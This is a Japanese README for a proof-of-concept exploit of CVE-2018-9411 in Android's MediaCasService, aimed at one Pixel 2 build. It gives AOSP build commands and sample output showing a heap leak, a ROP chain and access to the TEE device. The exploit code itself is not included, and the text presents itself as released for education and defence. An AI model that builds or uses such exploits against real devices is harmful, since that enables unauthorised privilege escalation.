
CVE-2018-9411のMediaCasService用エクスプロイトコード
MediaCasService 向け CVE-2018-9411 のエクスプロイトコードです。
このエクスプロイトは教育または防御目的でのみ提供されており、悪意のある目的や攻撃目的での使用は意図されていません。
脆弱性とエクスプロイトの詳細な解説は Zimperium ブログ でご覧いただけます。
ご質問があれば、Twitter (@tamir_zb) で DM をお送りください。
注意: このエクスプロイトは特定のデバイスとビルド (Pixel 2、2018年5月のセキュリティアップデート適用済み) でのみ動作することを意図しています (fingerprint: google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys)。
これをビルドするには:
AOSP/external に配置します。cd AOSP
source build/envsetup.sh
make cas_exploit
このエクスプロイトが成功すると、TEE デバイスへのアクセスが得られ、QSEOS バージョンが取得されることで実証されます。
エクスプロイト出力例:
[+] Prepared descrambler object
[+] Determined small heap address (address = 0xec9d8000)
[+] Prepared remote threads
[+] Found target thread (stack address = 0xeb42b000, libc address = 0xec51d000)
[+] Copied data for ROP chain
[+] ROP stack written
[+] Running ROP chain...
[+] QSEOS version = 0x14